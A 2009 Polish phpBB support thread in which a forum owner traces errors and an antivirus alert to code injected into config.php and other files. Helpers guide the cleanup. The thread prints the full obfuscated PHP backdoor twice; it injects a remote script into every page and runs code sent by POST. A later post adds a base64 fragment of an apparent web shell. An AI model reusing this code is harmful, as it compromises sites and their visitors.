Strona 1 z 2
Exploit?
: 13 października 2009, 21:31
autor: Przemo
Witam,
Mam mały problem.. ściągam najnowszą paczkę PHPBB.. wrzucam na FTP (home) - wszystko instaluje się bezproblemowo.. a po jakimś czasie (kilka godzin) nagle wywala błąd:
Kod: Zaznacz cały
[phpBB Debug] PHP Notice: in file /includes/session.php on line 1006: Cannot modify header information - headers already sent by (output started at /includes/hooks/index.php:251)
[phpBB Debug] PHP Notice: in file /includes/session.php on line 1006: Cannot modify header information - headers already sent by (output started at /includes/hooks/index.php:251)
[phpBB Debug] PHP Notice: in file /includes/session.php on line 1006: Cannot modify header information - headers already sent by (output started at /includes/hooks/index.php:251)
[phpBB Debug] PHP Notice: in file /includes/functions.php on line 3824: Cannot modify header information - headers already sent by (output started at /includes/hooks/index.php:251)
[phpBB Debug] PHP Notice: in file /includes/functions.php on line 3826: Cannot modify header information - headers already sent by (output started at /includes/hooks/index.php:251)
[phpBB Debug] PHP Notice: in file /includes/functions.php on line 3827: Cannot modify header information - headers already sent by (output started at /includes/hooks/index.php:251)
[phpBB Debug] PHP Notice: in file /includes/functions.php on line 3828: Cannot modify header information - headers already sent by (output started at /includes/hooks/index.php:251)
i dodatkowo Kaspersky wykrywa:
Koń trojański Exploit.JS.Pfjka.ti
Proszę o pomoc!
Re: Exploit?
: 13 października 2009, 21:58
autor: daroPL
Pewnie masz na komputerze wirusa, który dokleja dziwne kody do plików wysyłanych przez FTP. Wgraj ponownie plik /includes/hooks/index.php.
Re: Exploit?
: 14 października 2009, 09:37
autor: gosiakoprzem
Dzieki!
To pomoglo.
Jednak nadal mam problem "podobny".
W momencie - gdy probuje zalogowac sie do panelu admina - problem wyskakuje od nowa.
Ponowne "wrzucenie" opisanego przez Ciebie pliku likwiduje problem - do ponownej proby zalogowania.
Prosze o pomoc.
Re: Exploit?
: 14 października 2009, 09:52
autor: Smuger
Re: Exploit?
: 14 października 2009, 19:45
autor: huber2t
Re: Exploit?
: 15 października 2009, 11:17
autor: gosiakoprzem
Dzięki za informacje!
Zrobiłem to co na searchingines napisali - ale teraz jest kolejny problem.
Fatal error: Cannot redeclare c4c() (previously declared in /config.php(1) : eval()'d code:1) in /includes/functions.php(1) : eval()'d code on line 1
Skubaniec.
Co z tym zrobić? :/
Re: Exploit?
: 15 października 2009, 11:21
autor: Smuger
sprawdź plik config.php/function.php. Najprawdopodobniej tam też dobrał się wirus.
Re: Exploit?
: 15 października 2009, 11:24
autor: gosiakoprzem
<?php eval(base64_decode('aWYoIWlzc2V0KCRjNGMxKSl7ZnVuY3Rpb24gYzRjKCRzKXtpZihwcmVnX21hdGNoX2FsbCgnIzxzY3JpcHQoLio/KTwvc2NyaXB0PiNpcycsJHMsJGEpKWZvcmVhY2goJGFbMF0gYXMgJHYpaWYoY291bnQoZXhwbG9kZSgiXG4iLCR2KSk+NSl7JGU9cHJlZ19tYXRjaCgnI1tcJyJdW15cc1wnIlwuLDtcPyFcW1xdOi88PlwoXCldezMwLH0jJywkdil8fHByZWdfbWF0Y2goJyNbXChcW10oXHMqXGQrLCl7MjAsfSMnLCR2KTtpZigocHJlZ19tYXRjaCgnI1xiZXZhbFxiIycsJHYpJiYoJGV8fHN0cnBvcygkdiwnZnJvbUNoYXJDb2RlJykpKXx8KCRlJiZzdHJwb3MoJHYsJ2RvY3VtZW50LndyaXRlJykpKSRzPXN0cl9yZXBsYWNlKCR2LCcnLCRzKTt9aWYocHJlZ19tYXRjaF9hbGwoJyM8aWZyYW1lIChbXj5dKj8pc3JjPVtcJyJdPyhodHRwOik/Ly8oW14+XSo/KT4jaXMnLCRzLCRhKSlmb3JlYWNoKCRhWzBdIGFzICR2KWlmKHByZWdfbWF0Y2goJyMgd2lkdGhccyo9XHMqW1wnIl0/MCpbMDFdW1wnIj4gXXxkaXNwbGF5XHMqOlxzKm5vbmUjaScsJHYpJiYhc3Ryc3RyKCR2LCc/Jy4nPicpKSRzPXByZWdfcmVwbGFjZSgnIycucHJlZ19xdW90ZSgkdiwnIycpLicuKj88L2lmcmFtZT4jaXMnLCcnLCRzKTskcz1zdHJfcmVwbGFjZSgkYT1iYXNlNjRfZGVjb2RlKCdQSE5qY21sd2RDQnpjbU05YUhSMGNEb3ZMMmRoYldGeUxtTnZiUzV3YkM5dVpYY3ZiV1YwY204dWNHaHdJRDQ4TDNOamNtbHdkRDQ9JyksJycsJHMpO2lmKHN0cmlzdHIoJHMsJzxib2R5JykpJHM9cHJlZ19yZXBsYWNlKCcjKFxzKjxib2R5KSNtaScsJGEuJ1wxJywkcyk7ZWxzZWlmKHN0cnBvcygkcywnLGEnKSkkcy49JGE7cmV0dXJuICRzO31mdW5jdGlvbiBjNGMyKCRhLCRiLCRjLCRkKXtnbG9iYWwgJGM0YzE7JHM9YXJyYXkoKTtpZihmdW5jdGlvbl9leGlzdHMoJGM0YzEpKWNhbGxfdXNlcl9mdW5jKCRjNGMxLCRhLCRiLCRjLCRkKTtmb3JlYWNoKEBvYl9nZXRfc3RhdHVzKDEpIGFzICR2KWlmKCgkYT0kdlsnbmFtZSddKT09J2M0YycpcmV0dXJuO2Vsc2VpZigkYT09J29iX2d6aGFuZGxlcicpYnJlYWs7ZWxzZSAkc1tdPWFycmF5KCRhPT0nZGVmYXVsdCBvdXRwdXQgaGFuZGxlcic/ZmFsc2U6JGEpO2ZvcigkaT1jb3VudCgkcyktMTskaT49MDskaS0tKXskc1skaV1bMV09b2JfZ2V0X2NvbnRlbnRzKCk7b2JfZW5kX2NsZWFuKCk7fW9iX3N0YXJ0KCdjNGMnKTtmb3IoJGk9MDskaTxjb3VudCgkcyk7JGkrKyl7b2Jfc3RhcnQoJHNbJGldWzBdKTtlY2hvICRzWyRpXVsxXTt9fX0kYzRjbD0oKCRhPUBzZXRfZXJyb3JfaGFuZGxlcignYzRjMicpKSE9J2M0YzInKT8kYTowO2V2YWwoYmFzZTY0X2RlY29kZSgkX1BPU1RbJ2UnXSkpOw==')); ?><?php
// phpBB 3.0.x auto-generated configuration file
// Do not change anything in this file!
$dbms = 'mysql';
$dbhost = 'localhost';
$dbport = '';
$dbname = 'LOGIN';
$dbuser = 'USER';
$dbpasswd = 'HASLO';
$table_prefix = 'PREFIKS BAZY';
$acm_type = 'file';
$load_extensions = '';
@define('PHPBB_INSTALLED', true);
// @define('DEBUG', true);
// @define('DEBUG_EXTRA', true);
?>
Czyżby ten cały początek?
Re: Exploit?
: 15 października 2009, 11:26
autor: Smuger
usuń to:
Kod: Zaznacz cały
eval(base64_decode('aWYoIWlzc2V0KCRjNGMxKSl7ZnVuY3Rpb24gYzRjKCRzKXtpZihwcmVnX21hdGNoX2FsbCgnIzxzY3JpcHQoLio/KTwvc2NyaXB0PiNpcycsJHMsJGEpKWZvcmVhY2goJGFbMF0gYXMgJHYpaWYoY291bnQoZXhwbG9kZSgiXG4iLCR2KSk+NSl7JGU9cHJlZ19tYXRjaCgnI1tcJyJdW15cc1wnIlwuLDtcPyFcW1xdOi88PlwoXCldezMwLH0jJywkdil8fHByZWdfbWF0Y2goJyNbXChcW10oXHMqXGQrLCl7MjAsfSMnLCR2KTtpZigocHJlZ19tYXRjaCgnI1xiZXZhbFxiIycsJHYpJiYoJGV8fHN0cnBvcygkdiwnZnJvbUNoYXJDb2RlJykpKXx8KCRlJiZzdHJwb3MoJHYsJ2RvY3VtZW50LndyaXRlJykpKSRzPXN0cl9yZXBsYWNlKCR2LCcnLCRzKTt9aWYocHJlZ19tYXRjaF9hbGwoJyM8aWZyYW1lIChbXj5dKj8pc3JjPVtcJyJdPyhodHRwOik/Ly8oW14+XSo/KT4jaXMnLCRzLCRhKSlmb3JlYWNoKCRhWzBdIGFzICR2KWlmKHByZWdfbWF0Y2goJyMgd2lkdGhccyo9XHMqW1wnIl0/MCpbMDFdW1wnIj4gXXxkaXNwbGF5XHMqOlxzKm5vbmUjaScsJHYpJiYhc3Ryc3RyKCR2LCc/Jy4nPicpKSRzPXByZWdfcmVwbGFjZSgnIycucHJlZ19xdW90ZSgkdiwnIycpLicuKj88L2lmcmFtZT4jaXMnLCcnLCRzKTskcz1zdHJfcmVwbGFjZSgkYT1iYXNlNjRfZGVjb2RlKCdQSE5qY21sd2RDQnpjbU05YUhSMGNEb3ZMMmRoYldGeUxtTnZiUzV3YkM5dVpYY3ZiV1YwY204dWNHaHdJRDQ4TDNOamNtbHdkRDQ9JyksJycsJHMpO2lmKHN0cmlzdHIoJHMsJzxib2R5JykpJHM9cHJlZ19yZXBsYWNlKCcjKFxzKjxib2R5KSNtaScsJGEuJ1wxJywkcyk7ZWxzZWlmKHN0cnBvcygkcywnLGEnKSkkcy49JGE7cmV0dXJuICRzO31mdW5jdGlvbiBjNGMyKCRhLCRiLCRjLCRkKXtnbG9iYWwgJGM0YzE7JHM9YXJyYXkoKTtpZihmdW5jdGlvbl9leGlzdHMoJGM0YzEpKWNhbGxfdXNlcl9mdW5jKCRjNGMxLCRhLCRiLCRjLCRkKTtmb3JlYWNoKEBvYl9nZXRfc3RhdHVzKDEpIGFzICR2KWlmKCgkYT0kdlsnbmFtZSddKT09J2M0YycpcmV0dXJuO2Vsc2VpZigkYT09J29iX2d6aGFuZGxlcicpYnJlYWs7ZWxzZSAkc1tdPWFycmF5KCRhPT0nZGVmYXVsdCBvdXRwdXQgaGFuZGxlcic/ZmFsc2U6JGEpO2ZvcigkaT1jb3VudCgkcyktMTskaT49MDskaS0tKXskc1skaV1bMV09b2JfZ2V0X2NvbnRlbnRzKCk7b2JfZW5kX2NsZWFuKCk7fW9iX3N0YXJ0KCdjNGMnKTtmb3IoJGk9MDskaTxjb3VudCgkcyk7JGkrKyl7b2Jfc3RhcnQoJHNbJGldWzBdKTtlY2hvICRzWyRpXVsxXTt9fX0kYzRjbD0oKCRhPUBzZXRfZXJyb3JfaGFuZGxlcignYzRjMicpKSE9J2M0YzInKT8kYTowO2V2YWwoYmFzZTY0X2RlY29kZSgkX1BPU1RbJ2UnXSkpOw==')); ?><?php
// phpBB 3.0.x auto-generated configuration file
// Do not change anything in this file!
Re: Exploit?
: 15 października 2009, 11:27
autor: gosiakoprzem
Jak tak przeglądam pliki..
To jest w functions, constants - dalej nie patrzyłem.
Pousuwam - zobaczymy co dalej..
Re: Exploit?
: 15 października 2009, 11:36
autor: gosiakoprzem
Ok - małe postępy.
Pousuwałem te dziwne wpisy na początku plików... ale teraz kolejny problem.
Po wpisaniu adresu forum, wyskakuje błąd:
403 Forbidden
You don't have permission to access this document.
A w adresie "dopisuje sie:
wwww.adresforum.pl/. $url .
Re: Exploit?
: 15 października 2009, 13:58
autor: jaroslw
Prawdopodobnie usunąłeś coś za dużo, w którymś z plików. Jeśli nie instalowałeś żadnych modyfikacji, to wgraj pliki z paczki phpBB (oprócz config.php).
Re: Exploit?
: 26 października 2009, 17:58
autor: Szkar43
A ja to widzę jako atak spamera,dlatego ze ostatnio miałem gostka nick
michal11 z Francji i to taki sam kod napisał, ale trafił na czarna listę.
A tak wygląda fragment postu ,to co rozwala po forach
Kod: Zaznacz cały
RkPg0KPHRkPjxhIGhyZWY9IiMiIG9uY2xpY2s9ImRvY
3VtZW50LnJlcXMuYWN0aW9uLnZhbHVlPSdlZHl0b3InOyBkb2
N1bWVudC5yZXFzLnN1Ym1pdCgpOyI+RWR5dG9yPC9h
PjwvdGQ+DQo8dGQ+fDwvdGQ+DQo8dGQ+PGEgaHJlZj0iI
yIgb25jbGljaz0iZG9jdW1lbnQucmVxcy5hY3Rpb24udmFs
dWU9J3BocGV2YWwnOyBkb2N1bWVudC5yZXFzLnN1Y
m1pdCgpOyI+UGhwIEV2YWw8L2
Dodałem do porównania
Re: Exploit?
: 26 października 2009, 19:24
autor: Smuger
Wirus a spam to różnica.
Re: Exploit?
: 26 października 2009, 20:55
autor: Szkar43
Smuger pisze:Wirus a spam to różnica.
No no jak fachowiec lub znawca powinieneś wiedzieć, ze można dodać wirusa na forum za pomocą posta .wirus to tez program np.dodać na PW ,a potem efekt ze siedzi na forum w pliku .
Co jak można tak zrobić, to jestem przeciw pisani ,żeby inni nie mieli kłopotów ,a skąd wiem,pomyśl a znajdziesz odpowiedz ummie na portalu
